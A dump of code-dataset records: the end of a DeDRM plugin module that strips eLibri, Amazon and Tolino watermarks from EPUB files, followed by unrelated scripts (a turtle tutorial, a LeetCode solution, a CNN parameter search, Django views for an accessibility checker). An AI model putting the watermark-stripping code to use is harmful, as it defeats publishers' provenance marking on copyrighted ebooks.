path_to_ebook\n\n if (container_str == container_str_new):\n # container didn't change - no watermark\n return path_to_ebook\n\n # Re-package without watermark\n namelist = inf.namelist()\n namelist.remove(\"mimetype\")\n\n try: \n output = object.temporary_file(\".epub\").name\n kwds = dict(compression=ZIP_DEFLATED, allowZip64=False)\n with closing(ZipFile(open(output, 'wb'), 'w', **kwds)) as outf:\n for path in ([\"mimetype\"] + namelist):\n\n data = inf.read(path)\n if path == opf_path:\n # Found OPF, replacing ...\n data = container_str_new\n\n zi = ZipInfo(path)\n oldzi = inf.getinfo(path)\n try: \n zi.compress_type = oldzi.compress_type\n if path == \"mimetype\":\n zi.compress_type = ZIP_STORED\n zi.date_time = oldzi.date_time\n zi.comment = oldzi.comment\n zi.extra = oldzi.extra\n zi.internal_attr = oldzi.internal_attr\n zi.external_attr = oldzi.external_attr\n zi.volume = oldzi.volume\n zi.create_system = oldzi.create_system\n zi.create_version = oldzi.create_version\n\n if any(ord(c) >= 128 for c in path) or any(ord(c) >= 128 for c in zi.comment):\n # If the file name or the comment contains any non-ASCII char, set the UTF8-flag\n zi.flag_bits |= 0x800\n except:\n pass\n\n # Python 3 has a bug where the external_attr is reset to `0o600 << 16`\n # if it's NULL, so we need a workaround:\n if zi.external_attr == 0: \n zi = ZeroedZipInfo(zi)\n\n outf.writestr(zi, data)\n except:\n traceback.print_exc()\n return path_to_ebook\n \n if had_elibri:\n print(\"Watermark: Successfully stripped eLibri watermark from OPF file.\")\n if had_amazon:\n print(\"Watermark: Successfully stripped Amazon watermark from OPF file.\")\n\n return output\n\n\n\ndef removeCDPwatermark(object, path_to_ebook):\n # \"META-INF/cdp.info\" is a watermark file used by some Tolino vendors. \n # We don't want that in our eBooks, so lets remove that file.\n try: \n infile = ZipFile(open(path_to_ebook, 'rb'))\n namelist = infile.namelist()\n if 'META-INF/cdp.info' not in namelist:\n return path_to_ebook\n\n namelist.remove(\"mimetype\")\n namelist.remove(\"META-INF/cdp.info\")\n\n output = object.temporary_file(\".epub\").name\n\n kwds = dict(compression=ZIP_DEFLATED, allowZip64=False)\n with closing(ZipFile(open(output, 'wb'), 'w', **kwds)) as outf:\n for path in ([\"mimetype\"] + namelist):\n\n data = infile.read(path)\n \n zi = ZipInfo(path)\n oldzi = infile.getinfo(path)\n try: \n zi.compress_type = oldzi.compress_type\n if path == \"mimetype\":\n zi.compress_type = ZIP_STORED\n zi.date_time = oldzi.date_time\n zi.comment = oldzi.comment\n zi.extra = oldzi.extra\n zi.internal_attr = oldzi.internal_attr\n zi.external_attr = oldzi.external_attr\n zi.volume = oldzi.volume\n zi.create_system = oldzi.create_system\n zi.create_version = oldzi.create_version\n\n if any(ord(c) >= 128 for c in path) or any(ord(c) >= 128 for c in zi.comment):\n # If the file name or the comment contains any non-ASCII char, set the UTF8-flag\n zi.flag_bits |= 0x800\n except:\n pass\n\n # Python 3 has a bug where the external_attr is reset to `0o600 << 16`\n # if it's NULL, so we need a workaround:\n if zi.external_attr == 0: \n zi = ZeroedZipInfo(zi)\n\n outf.writestr(zi, data)\n \n print(\"Watermark: Successfully removed cdp.info watermark\")\n return output\n\n except: \n traceback.print_exc()\n return path_to_ebook","sub_path":"DeDRM_plugin/epubwatermark.py","file_name":"epubwatermark.py","file_ext":"py","file_size_in_byte":14559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"167598751","text":"'''\nHacker Pals\nPython Turtles Tutorial\nhttp://hackerpals.com\n'''\n\nimport turtle\n\nleo = turtle.Turtle() # Create Leo\n\n# Loop 4 times. Everything I want to repeat is\n# *indented* by four spaces.\nfor i in range(4):\n leo.forward(50)\n leo.right(90)\n\n# This isn't indented, so we aren't repeating it.\nturtle.done()\n","sub_path":"ex3.py","file_name":"ex3.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"519215975","text":"\ndef work(a):\n #а-я, о-е, у-ю, ы-и, э-е\n glasnie = ['а','я','о','e','у','ю','ы','и','э','e']\n answer = ''\n \n for i in a:\n if(i not in glasnie):\n answer+=i\n print(answer)\n\ndef is_right(a):\n try:\n a = str(a)\n except ValueError:\n return False\n return a\n \ndef main():\n while True:\n a = input('Введите слово ')\n a = is_right(a)\n if(a is False): \n print('Введите корректное слово ')\n continue\n work(a)\n asnwer = input(\"Продолжить? (да/нет) \")\n if(asnwer == 'нет'):\n break\n \nmain()","sub_path":"10/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"65470076","text":"# class Solution(object):\n# def minWindow(self, s, t):\n# \"\"\"\n# :type s: str\n# :type t: str\n# :rtype: str\n# \"\"\"\n# if len(s) < len(t):\n# return \"\"\n#\n# d = dict()\n# for i in range(len(t)):\n# d[t[i]] = d.get(t[i], 0) + 1\n#\n# slow = 0\n# minLen = float(\"inf\")\n# matchCount = 0\n# index = 0\n#\n# for i in range(len(s)):\n# if s[i] in d:\n# d[s[i]] -= 1\n# ####from 1 to 0\n# if d[s[i]] == 0:\n# matchCount += 1\n#\n# while matchCount == len(d.keys()):\n# ####find a valid substring\n# if i - slow + 1 < minLen:\n# minLen = i - slow + 1\n# index = slow\n# leftmost = s[slow]\n# slow += 1\n# if leftmost not in d:\n# continue\n# else:\n# ####from 0 to 1\n# d[leftmost] += 1\n# if d[leftmost] > 0:\n# matchCount -= 1\n#\n# return \"\" if minLen == float(\"inf\") else s[index : index + minLen]\n#\n#\nimport collections\n\n#\n#\n# class Solution:\n# def minWindow(self, s: str, t: str) -> str:\n# res = \"\"\n# left, cnt, minLen = 0, 0, float(\"inf\")\n# count = collections.Counter(t)\n# for i, c in enumerate(s):\n# print(f\"left = {left}, cnt={cnt}, minLen={minLen}, count={count}\")\n# count[c] -= 1\n# if count[c] >= 0:\n# cnt += 1\n# while cnt == len(t):\n# if minLen > i - left + 1:\n# minLen = i - left + 1\n# res = s[left : i + 1]\n# count[s[left]] += 1\n# if count[s[left]] > 0:\n# cnt -= 1\n# left += 1\n# return res\n\nimport pysnooper\n\n\nclass Solution:\n @pysnooper.snoop()\n def minWindow(self, s: str, t: str) -> str:\n res = \"\"\n cur = float(\"inf\")\n\n start = 0\n debt = len(t)\n d = collections.Counter(t)\n for i, c in enumerate(s):\n d[c] -= 1\n if d[c] >= 0:\n debt -= 1\n while debt == 0:\n if cur > i - start + 1:\n cur = i - start + 1\n res = s[start : i + 1]\n d[s[start]] += 1\n if d[s[start]] > 0:\n debt += 1\n start += 1\n return res\n\n\nif __name__ == \"__main__\":\n S = \"ADOBECODEBANC\"\n T = \"ABC\"\n result = Solution().minWindow(S, T)\n print(result)\n","sub_path":"Leetcode/0076-Minimum-Window-Substring.py","file_name":"0076-Minimum-Window-Substring.py","file_ext":"py","file_size_in_byte":2720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"382677520","text":"import os\nimport time\nimport numpy as np\nfrom Experiments import CNNExperiment\n\nnp.set_printoptions(precision=4, suppress=True)\n\n# some arbitrary targets\ntarget_neurons = (('caffenet', 'fc8', 1), ('caffenet', 'fc8', 407), ('caffenet', 'fc8', 632),\n # ('placesCNN', 'fc8', 55), ('placesCNN', 'fc8', 74), ('placesCNN', 'fc8', 162),\n # ('googlenet', 'loss3/classifier', 1), ('googlenet', 'loss3/classifier', 407),\n # ('googlenet', 'loss3/classifier', 632),\n # ('resnet-152', 'fc1000', 1), ('resnet-152', 'fc1000', 407), ('resnet-152', 'fc1000', 632),\n )\n\noptimizer_name = 'genetic'\ntarget_params = ['population_size', 'mutation_rate', 'mutation_size', 'selectivity', 'heritability', 'n_conserve']\n# optimizer_name = 'FDGD'\n# target_params = ['n_samples', 'search_radius', 'learning_rate', 'antithetic']\ninit_codes_dir = None\nstoch = False\nif stoch:\n target_params += ['reps']\ngenerator_name = 'deepsim-fc6'\nserial_number = 1\nmax_images = 10000\nsearch_steps = (5, 3,)\nadvance_in_cycle = False\n\n# param_vals_options is accessed as tuple = param_vals_options[optimizer_name][generator_name][stoch]\n# tuple[0] is tuple containing current best values, in the same order as target_params\n# tuple[1] is tuple containing either\n# one tuple of tuples per target_param (in the same order)\n# - tuple_[0]: value step sizes, in decreasing order\n# - tuple_[1]: value bounds (lbound, ubound), inclusive\n# - tuple_[2]: value dtype\n# or value options\nparam_vals_options = ( # Genetic\n (20, 0.5, 0.5, 2, 0.5, 0, None,),\n (((15, 10, 5, 2), (2, 100), int), # population_size\n ((0.2, 0.1, 0.05), (0, 1), float), # mutation_rate\n ((0.5, 0.25, 0.1, 0.05), (0, 20), float), # mutation_size\n ((1, 0.5, 0.25), (0.1, 5), float), # selectivity\n ((0.25, 0.1), (0.5, 1), float), # heritability\n ((1,), (0, 10), int)), # n_conserve\n)\n# param_vals_options = ( # FDGD\n# (20, 1.5, 1.5, True),\n# (((20, 10, 5, 2, 1), (2, 100), int), # n_samples\n# ((0.5, 0.25, 0.1), (0.01, 10), float), # search_radius\n# ((0.5, 0.25, 0.1), (0.01, 20), float), # learning_rate\n# (True, False)), # antithetic\n# )\n\njobsuperdir = 'param_opt' # to be changed by user\njobname = '%s-%s-%s%d' % (optimizer_name, generator_name, ('det', 'stoch')[stoch], serial_number)\njobrootdir = os.path.join(jobsuperdir, jobname)\nlogfn = '%s.txt' % jobname\nlogfpath = os.path.join(jobsuperdir, logfn)\nif os.path.isfile(logfpath):\n raise IOError('log file %s exists!' % logfpath)\n\n\ndef flush_logtext_to_file(logtext):\n with open(logfpath, 'a') as f:\n f.write(logtext)\n return ''\n\n\n# current best settings and param val options\nbest_exp_settings = {\n 'optimizer_name': optimizer_name,\n 'optimizer_parameters': {\n 'generator_name': generator_name,\n 'initial_codes_dir': init_codes_dir,\n },\n 'with_write': False,\n 'max_images': max_images,\n 'random_seed': 0,\n 'stochastic': stoch,\n 'config_file_path': __file__,\n}\nparam_stepsize_ptr = {param: 0 for param in target_params}\nparam_searchsteps_ptr = {param: 0 for param in target_params}\nparam_steps_unchanged = {param: 0 for param in target_params}\nparam_fixed_val_options = {param: not isinstance(param_vals_options[1][iparam][0], tuple)\n for iparam, param in enumerate(target_params)}\nparam_to_index = {param: iparam for iparam, param in enumerate(target_params)}\n\n\ndef get_param_val(param, exp_settings):\n if param == 'reps':\n return exp_settings[param]\n else:\n return exp_settings['optimizer_parameters'][param]\n\n\ndef set_param_val(param, new_val, exp_settings):\n if param == 'reps':\n exp_settings[param] = new_val\n else:\n exp_settings['optimizer_parameters'][param] = new_val\n return exp_settings\n\n\ndef get_params_vals(exp_settings):\n param_vals = [None for _ in target_params]\n for param in target_params:\n param_vals[param_to_index[param]] = get_param_val(param, exp_settings)\n return param_vals\n\n\ndef get_param_val_options(param, param_curr_best):\n iparam = param_to_index[param]\n if param_fixed_val_options[param]:\n return param_vals_options[1][iparam]\n stepsize = param_vals_options[1][iparam][0][param_stepsize_ptr[param]]\n ub, lb = param_vals_options[1][iparam][1]\n dtype = param_vals_options[1][iparam][2]\n searchsteps = search_steps[param_searchsteps_ptr[param]]\n val_options = np.arange(param_curr_best-stepsize*searchsteps, param_curr_best+stepsize*searchsteps, stepsize)\n val_options = np.round(np.unique(np.clip(val_options, ub, lb)), 3).astype(dtype)\n val_options = val_options[np.argsort(np.abs(val_options-param_curr_best))][:searchsteps]\n val_options.sort()\n return val_options\n\n\ndef get_remaining_stepsizes():\n remaining_stepsizes = {}\n for param in target_params:\n iparam = param_to_index[param]\n if param_fixed_val_options[param]:\n remaining_stepsizes[param] = None\n else:\n remaining_stepsizes[param] = param_vals_options[1][iparam][0][param_stepsize_ptr[param]:]\n return remaining_stepsizes\n\n\nparam_val_options = {}\nparams_curr_best = {}\nfor iparam, param in enumerate(target_params):\n param_curr_best = param_vals_options[0][iparam]\n params_curr_best[param] = param_curr_best\n best_exp_settings = set_param_val(param, param_curr_best, best_exp_settings)\n param_val_options[param] = get_param_val_options(param, param_curr_best)\nbest_scores = np.ones(len(target_neurons)) # dummy initial score\nlogtext = 'Initial condition:\\n\\tbest scores (dummy initialized)\\n\\t\\t%s\\n\\texp settings\\n\\t\\t%s\\n' %\\\n (str(best_scores), str(best_exp_settings))\nlogtext += 'Target neurons:\\n\\t%s\\n' % str(target_neurons)\nlogtext += 'Target params values:\\n\\t%s\\n' % param_val_options\nlogtext += 'Target params step sizes:\\n\\t%s\\n' % str(get_remaining_stepsizes())\nlogtext = flush_logtext_to_file(logtext)\n\nfinished = False\nrecently_advanced_params = set()\ntested_params_vals_scores = {}\nt0 = time.time()\niround = -1\nwhile not finished:\n iround += 1\n # change up the order of target params\n np.random.shuffle(target_params)\n\n logtext += '\\n\\nRound %d\\nTarget param order:\\n\\t%s\\n' % (iround, target_params)\n # logtext += 'Target params values:\\n\\t%s\\n' % param_val_options\n logtext = flush_logtext_to_file(logtext)\n\n none_changed = True\n for iparam, param in enumerate(target_params):\n logtext += '\\nTesting param %s\\n' % param\n old_param_val = get_param_val(param, best_exp_settings)\n tested_param_vals = []\n scoress = [] # list of lists (one per param val option) of scores (one per target neuron)\n score_ratioss = [] # same structure as above\n mean_score_ratios = [] # list of ratios (one per param val option), averaged over target neurons\n for new_param_val in param_val_options[param]:\n if new_param_val == old_param_val and (iround > 0 or iparam > 0):\n continue\n tested_param_vals.append(new_param_val)\n to_try_params_vals = get_params_vals(best_exp_settings)\n to_try_params_vals[param_to_index[param]] = new_param_val\n to_try_params_vals = tuple(to_try_params_vals)\n try:\n scoress.append(tested_params_vals_scores[to_try_params_vals])\n logtext += '\\tvalue: %s, scores\\t[' % str(new_param_val)\n for curr_score in scoress[-1]:\n logtext += '%5.2f, ' % curr_score\n except KeyError:\n scoress.append([])\n best_exp_settings = set_param_val(param, new_param_val, best_exp_settings)\n logtext += '\\tvalue: %s, scores\\t[' % str(new_param_val)\n for target_neuron in target_neurons:\n neuron = target_neuron\n if len(neuron) == 5:\n subdir = '%s_%s_%04d_%d,%d' % \\\n (neuron[0], neuron[1].replace('/', '_'), neuron[2], neuron[3], neuron[4])\n else:\n subdir = '%s_%s_%04d' % (neuron[0], neuron[1].replace('/', '_'), neuron[2])\n i = 0\n while os.path.isdir(os.path.join(jobrootdir, subdir, str(i))):\n i += 1\n best_exp_settings['project_dir'] = os.path.join(jobrootdir, subdir, str(i))\n best_exp_settings['target_neuron'] = target_neuron\n os.makedirs(best_exp_settings['project_dir'])\n\n experiment = CNNExperiment(**best_exp_settings)\n experiment.run()\n\n curr_score = np.max(experiment.scorer.curr_scores, axis=0)\n scoress[-1].append(curr_score)\n logtext += '%5.2f, ' % curr_score\n tested_params_vals_scores[to_try_params_vals] = scoress[-1].copy()\n\n score_ratioss.append(np.array(scoress[-1]) / best_scores)\n mean_score_ratios.append(np.mean(score_ratioss[-1]))\n if max(mean_score_ratios) == mean_score_ratios[-1] and mean_score_ratios[-1] > 1:\n sigstr = '*'\n else:\n sigstr = ''\n logtext = logtext[:-2] + ']\\t%5.2f%s\\t(T: +%d s)\\n' % (mean_score_ratios[-1], sigstr, int(time.time() - t0))\n logtext = flush_logtext_to_file(logtext)\n if len(scoress) == 0:\n continue\n scoress = np.array(scoress)\n score_ratio = np.array(mean_score_ratios)\n imax = np.argmax(score_ratio)\n\n if score_ratio[imax] > 1:\n new_param_val = tested_param_vals[imax]\n params_curr_best[param] = new_param_val\n best_scores = np.clip(scoress[imax], 1, None) # in case score is negative or underflows\n logtext += 'Selected new value %s for param %s\\n' % (str(tested_param_vals[imax]), param)\n logtext += 'Current parameter setting:\\n\\t%s\\n' % str(params_curr_best)\n if new_param_val != old_param_val: # for edge case of first rep, first iparam\n none_changed = False\n param_steps_unchanged[param] = 0\n param_searchsteps_ptr[param] = 0\n param_val_options[param] = get_param_val_options(param, new_param_val)\n if not param_fixed_val_options[param]:\n logtext += 'New target values for param %s:\\n\\t%s\\n' % (param, param_val_options[param])\n logtext = flush_logtext_to_file(logtext)\n else:\n new_param_val = old_param_val\n logtext += 'Selected old value %s for param %s\\n' % (old_param_val, param)\n param_steps_unchanged[param] += 1\n best_exp_settings = set_param_val(param, new_param_val, best_exp_settings)\n\n if none_changed:\n advanceable_params = [param for param in target_params if not param_fixed_val_options[param]]\n if advance_in_cycle:\n considered_params = [param for param in advanceable_params if param not in recently_advanced_params]\n else:\n considered_params = advanceable_params\n steps_unchanged = [param_steps_unchanged[param] for param in considered_params]\n advanced = False\n advanced_param = None\n for advance_param in np.array(considered_params)[np.argsort(steps_unchanged)][::-1]:\n if param_stepsize_ptr[advance_param] == -1:\n if param_searchsteps_ptr[advance_param] == -1:\n continue\n else:\n param_searchsteps_ptr[advance_param] += 1\n if param_searchsteps_ptr[advance_param] == len(search_steps):\n param_searchsteps_ptr[advance_param] = -1\n advanced = True\n advanced_param = advance_param\n break\n else:\n param_stepsize_ptr[advance_param] += 1\n iparam = param_to_index[advance_param]\n if param_stepsize_ptr[advance_param] == len(param_vals_options[1][iparam][0]):\n param_stepsize_ptr[advance_param] = -1\n advanced = True\n advanced_param = advance_param\n break\n\n if not advanced:\n finished = True\n else:\n if advanced_param == 'reps':\n curr_param_val = best_exp_settings[advanced_param]\n else:\n curr_param_val = best_exp_settings['optimizer_parameters'][advanced_param]\n param_val_options[advanced_param] = get_param_val_options(advanced_param, curr_param_val)\n recently_advanced_params.add(advanced_param)\n if len(recently_advanced_params) == len(advanceable_params):\n recently_advanced_params = set()\n logtext += '\\nAdvanced optimization (param: %s)\\nCurrent target parameter step sizes:\\n\\t%s\\n' %\\\n (advanced_param, str(get_remaining_stepsizes()))\n\nflush_logtext_to_file('\\n\\nFinal parameter setting:\\n\\t%s\\n' % str(best_exp_settings))\n","sub_path":"tools/param_opt_with_CNN2.py","file_name":"param_opt_with_CNN2.py","file_ext":"py","file_size_in_byte":13243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"612372256","text":"import factory\n\nfrom bluebottle.rewards.models import Reward\nfrom bluebottle.test.factory_models.projects import ProjectFactory\n\n\nclass RewardFactory(factory.DjangoModelFactory):\n class Meta(object):\n model = Reward\n\n project = factory.SubFactory(ProjectFactory)\n title = factory.Sequence(lambda n: 'Reward_{0}'.format(n))\n description = factory.Sequence(lambda n: 'Just some nice reward. No {0}'.format(n))\n amount = 50\n limit = 0\n","sub_path":"bluebottle/test/factory_models/rewards.py","file_name":"rewards.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"258626531","text":"from django.template.loader import get_template\nfrom django.template import RequestContext\nfrom django.http import HttpResponse, HttpResponseRedirect, Http404\nfrom django.contrib.auth.decorators import login_required\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.conf import settings\nfrom datetime import datetime, date, timedelta\n\nfrom project.settings import ACCT_TYPE_QUOTA, DEFAULT_QUOTA, ACCT_TYPE_BUFFER, DEFAULT_BUFFER\nfrom project.settings import STATS_DAYS_OFFSET as DAYS_OFFSET\nfrom labels import labels\nfrom models import UserProfile, UserReport, GuestReport, UsageStats\nfrom forms import BasicEvalForm, DepthEvalForm, MultiEvalForm\nfrom forms import UserForm, ProfileForm, ManageReportForm\nfrom evaluate import evaluate, multi_evaluate, evaluate_dhtml\nfrom processors import get_report_content, get_pgrpteval_content\nfrom uid import generate\n\n#----------------------------------------------------------------\ndef index(request):\n \"\"\"\n Serve the appropriate Run FAE form based on the user's login status.\n \"\"\"\n if request.user.is_authenticated():\n return index_user(request)\n else:\n return index_guest(request)\n\n#----------------------------------------------------------------\ndef index_user(request):\n\n # Create response object for saving cookie values\n response = HttpResponse()\n\n if request.method == 'POST':\n form = DepthEvalForm(request.POST)\n if form.is_valid():\n # Check that formid matches session variable\n if not check_formid(request):\n raise Http404(labels['invalid_formid'])\n params = {\n 'url': form.cleaned_data['url'],\n 'title': form.cleaned_data['title'] or labels['untitled'],\n 'depth': form.cleaned_data['depth'],\n 'span': form.cleaned_data['span'],\n 'dhtml': form.cleaned_data['dhtml'] and settings.ENABLE_DHTMLGET,\n 'username': request.user.username\n }\n now = datetime.now()\n status, uid = evaluate(params, request.user.is_authenticated(), now)\n if status:\n report = UserReport(\n id = uid,\n user = request.user,\n timestamp = now,\n pgcount = status,\n url = params['url'],\n urlcount = 1,\n depth = params['depth'],\n title = params['title'],\n dhtml = params['dhtml']\n )\n report.save()\n response = HttpResponseRedirect('/report/%s/' % uid)\n\n # Set cookie values on whichever response object we have\n response.set_cookie('d_url', value=form.cleaned_data['url'], max_age=settings.MAX_AGE)\n response.set_cookie('d_title', value=form.cleaned_data['title'], max_age=settings.MAX_AGE)\n response.set_cookie('d_depth', value=form.cleaned_data['depth'], max_age=settings.MAX_AGE)\n response.set_cookie('d_span', value=form.cleaned_data['span'], max_age=settings.MAX_AGE)\n if form.cleaned_data['dhtml']:\n response.set_cookie('d_dhtml', value=form.cleaned_data['dhtml'], max_age=settings.MAX_AGE)\n else:\n response.delete_cookie('d_dhtml')\n\n if status:\n return response\n else:\n return message(request, response, 'Unable to create report!')\n\n else:\n init_values = {}\n if 'd_url' in request.COOKIES:\n init_values['url'] = request.COOKIES['d_url']\n if 'd_title' in request.COOKIES:\n init_values['title'] = request.COOKIES['d_title']\n if 'd_depth' in request.COOKIES:\n init_values['depth'] = request.COOKIES['d_depth']\n if 'd_span' in request.COOKIES:\n init_values['span'] = request.COOKIES['d_span']\n if 'd_dhtml' in request.COOKIES:\n init_values['dhtml'] = request.COOKIES['d_dhtml']\n form = DepthEvalForm(initial=init_values)\n\n context = {\n 'page_type': 'index',\n 'title': labels['index'],\n 'formid': store_formid(request),\n 'form': form,\n }\n\n # Return response\n t = get_template('index_user.html')\n html = t.render(RequestContext(request, context))\n response.write(html)\n return response\n\n#----------------------------------------------------------------\ndef index_guest(request):\n\n # Create response object for saving cookie values\n response = HttpResponse()\n\n if request.method == 'POST':\n form = BasicEvalForm(request.POST)\n if form.is_valid():\n # Check that formid matches session variable\n if not check_formid(request):\n raise Http404(labels['invalid_formid'])\n params = {\n 'url': form.cleaned_data['url'],\n 'title': labels['untitled'],\n 'dhtml': form.cleaned_data['dhtml'] and settings.ENABLE_DHTMLGET,\n 'username': 'guest'\n }\n now = datetime.now()\n status, uid = evaluate(params, False, now)\n if status:\n report = GuestReport(\n id = uid,\n timestamp = now,\n pgcount = status,\n url = params['url'],\n dhtml = params['dhtml']\n )\n report.save()\n response = HttpResponseRedirect('/report/%s/' % uid)\n\n response.set_cookie('b_url', value=form.cleaned_data['url'], max_age=settings.MAX_AGE)\n if form.cleaned_data['dhtml']:\n response.set_cookie('b_dhtml', value=form.cleaned_data['dhtml'], max_age=settings.MAX_AGE)\n else:\n response.delete_cookie('b_dhtml')\n\n if status:\n return response\n else:\n return message(request, response, 'Unable to create report!')\n else:\n init_values = {}\n if 'b_url' in request.COOKIES:\n init_values['url'] = request.COOKIES['b_url']\n if 'b_dhtml' in request.COOKIES:\n init_values['dhtml'] = request.COOKIES['b_dhtml']\n form = BasicEvalForm(initial=init_values)\n\n context = {\n 'page_type': 'index',\n 'title': labels['index'],\n 'formid': store_formid(request),\n 'form': form,\n }\n\n # Return response\n t = get_template('index_guest.html')\n html = t.render(RequestContext(request, context))\n response.write(html)\n return response\n\n#----------------------------------------------------------------\n@login_required\ndef index_multi(request):\n\n # Create response object for saving cookie values\n response = HttpResponse()\n\n if request.method == 'POST':\n form = MultiEvalForm(request.POST)\n if form.is_valid():\n # Check that formid matches session variable\n if not check_formid(request):\n raise Http404(labels['invalid_formid'])\n params = {\n 'urls': form.cleaned_data['urls'],\n 'title': form.cleaned_data['title'] or labels['untitled'],\n 'dhtml': form.cleaned_data['dhtml'] and settings.ENABLE_DHTMLGET,\n 'username': request.user.username\n }\n now = datetime.now()\n status, uid = multi_evaluate(params, request.user.is_authenticated(), now)\n\n if status:\n urls = form.cleaned_data['urls'].split()\n report = UserReport(\n id = uid,\n user = request.user,\n timestamp = now,\n pgcount = status,\n url = urls[0],\n urlcount = len(urls),\n depth = 0,\n title = params['title'],\n dhtml = params['dhtml']\n )\n report.save()\n response = HttpResponseRedirect('/report/%s/' % uid)\n\n response.set_cookie('m_urls', value=form.cleaned_data['urls'], max_age=settings.MAX_AGE)\n response.set_cookie('m_title', value=form.cleaned_data['title'], max_age=settings.MAX_AGE)\n if form.cleaned_data['dhtml']:\n response.set_cookie('m_dhtml', value=form.cleaned_data['dhtml'], max_age=settings.MAX_AGE)\n else:\n response.delete_cookie('m_dhtml')\n\n if status:\n return response\n else:\n return message(request, response, 'Unable to create report!')\n else:\n init_values = {}\n if 'm_urls' in request.COOKIES:\n init_values['urls'] = request.COOKIES['m_urls']\n if 'm_title' in request.COOKIES:\n init_values['title'] = request.COOKIES['m_title']\n if 'm_dhtml' in request.COOKIES:\n init_values['dhtml'] = request.COOKIES['m_dhtml']\n form = MultiEvalForm(initial=init_values)\n\n context = {\n 'page_type': 'index',\n 'title': labels['multi'],\n 'formid': store_formid(request),\n 'form': form,\n }\n\n # Return response\n t = get_template('index_multi.html')\n html = t.render(RequestContext(request, context))\n response.write(html)\n return response\n\n#----------------------------------------------------------------\ndef process_dhtml(request):\n \"\"\"\n Evaluate one or more DHTML DOM snapshots sent as POST data.\n \"\"\"\n if not request.method == 'POST':\n raise Http404('Unable to process DHTML data!')\n\n if 'doc1' in request.POST and len(request.POST['doc1']):\n params = {\n 'request': request,\n 'url': 'Unspecified',\n 'depth': '0',\n 'title': 'DHTML Report',\n 'dhtml': settings.ENABLE_DHTMLGET,\n 'username': request.user.username\n }\n now = datetime.now()\n status, uid = evaluate_dhtml(params, request.user.is_authenticated(), now)\n if status:\n if request.user.is_authenticated():\n report = UserReport(\n id = uid,\n user = request.user,\n timestamp = now,\n pgcount = status,\n url = params['url'],\n urlcount = 1,\n depth = params['depth'],\n title = params['title'],\n dhtml = params['dhtml']\n )\n else:\n report = GuestReport(\n id = uid,\n timestamp = now,\n pgcount = status,\n url = params['url'],\n dhtml = params['dhtml']\n )\n report.save()\n return HttpResponseRedirect('/report/%s/' % uid)\n else:\n return message(request, HttpResponse(), 'Unable to create report!')\n\n else:\n return message(request, HttpResponse(), 'No DHTML data detected!')\n \n#----------------------------------------------------------------\ndef process_link(request):\n \"\"\"\n Evaluate referrer page with direct link to FAE.\n \"\"\"\n if 'HTTP_REFERER' in request.META and len(request.META['HTTP_REFERER']):\n params = {\n 'url': request.META['HTTP_REFERER'],\n 'depth': '0',\n 'title': 'Direct Link Report',\n 'dhtml': settings.ENABLE_DHTMLGET,\n 'username': 'guest'\n }\n now = datetime.now()\n status, uid = evaluate(params, False, now)\n if status:\n report = GuestReport(\n id = uid,\n timestamp = now,\n pgcount = status,\n url = params['url'],\n dhtml = params['dhtml']\n )\n report.save()\n return HttpResponseRedirect('/report/%s/' % uid)\n else:\n return message(request, response, 'Unable to create report!')\n\n else:\n return message(request, HttpResponse(), 'No HTTP_REFERER detected!')\n\n#----------------------------------------------------------------\ndef check_formid(request):\n return request.POST['formid'] == request.session.get('formid')\n\n#----------------------------------------------------------------\ndef store_formid(request):\n formid = generate()\n request.session['formid'] = formid\n return formid\n\n#----------------------------------------------------------------\ndef message(request, response, text):\n \"\"\"\n Return the response, which may have cookie data associated\n with it, using the message template.\n \"\"\"\n t = get_template('message.html')\n context = {'page_type': 'message', 'title': text}\n html = t.render(RequestContext(request, context))\n response.write(html)\n return response\n\n#----------------------------------------------------------------\ndef registration_closed(request):\n \"\"\"\n Return the response using the specified template.\n \"\"\"\n t = get_template('registration/registration_closed.html')\n context = { 'installation': settings.INSTALLATION, 'public_url': settings.PUBLIC_URL }\n html = t.render(RequestContext(request, context))\n return HttpResponse(html)\n\n#----------------------------------------------------------------\n@login_required\ndef archived_reports(request):\n \"\"\"\n Display a list of the user's currently archived reports.\n \"\"\"\n report_list = UserReport.objects.filter(user=request.user)\n context = {\n 'page_type': 'archive',\n 'title': labels['archive'],\n 'username': request.user.username,\n 'report_list': report_list\n }\n\n # For highlighting currently selected report in list\n report_info = request.session.get('report', {})\n if report_info: context['current_id'] = report_info['rptid']\n\n # Return response\n t = get_template('archive.html')\n html = t.render(RequestContext(request, context))\n return HttpResponse(html)\n\n#----------------------------------------------------------------\n@login_required\ndef manage_reports(request):\n \"\"\"\n Allow user to select which reports should be archived.\n \"\"\"\n report_list = UserReport.objects.filter(user=request.user)\n status = ''\n num_archive = 0\n for report in report_list:\n if report.archive:\n num_archive += 1\n\n try:\n profile = request.user.get_profile()\n quota = ACCT_TYPE_QUOTA[profile.acct_type]\n buffer = ACCT_TYPE_BUFFER[profile.acct_type]\n except ObjectDoesNotExist:\n quota = DEFAULT_QUOTA\n buffer = DEFAULT_BUFFER\n\n if request.method == 'POST':\n archive_info = []; i = 0\n for report in report_list:\n archive_info.append((report, ManageReportForm(request.POST, prefix=str(i), instance=report)))\n i += 1\n # validate based on number of selected reports\n count = len(request.POST)\n if count <= quota:\n for (report, form) in archive_info:\n form.save()\n status = 'Selection of permanently archived reports has been updated!'\n num_archive = count\n else:\n return message(request, HttpResponse(), 'Number of selected reports exceeds quota!')\n \n else:\n archive_info = []; i = 0\n for report in report_list:\n archive_info.append((report, ManageReportForm(prefix=str(i), instance=report)))\n i += 1\n\n context = {\n 'page_type': 'manage',\n 'title': labels['manage'],\n 'username': request.user.username,\n 'archive_info': archive_info,\n 'report_list': report_list,\n 'quota': quota,\n 'buffer': buffer,\n 'days_offset' : DAYS_OFFSET,\n 'num_archive' : num_archive,\n 'status': status,\n }\n\n # For highlighting currently selected report in list\n report_info = request.session.get('report', {})\n if report_info: context['current_id'] = 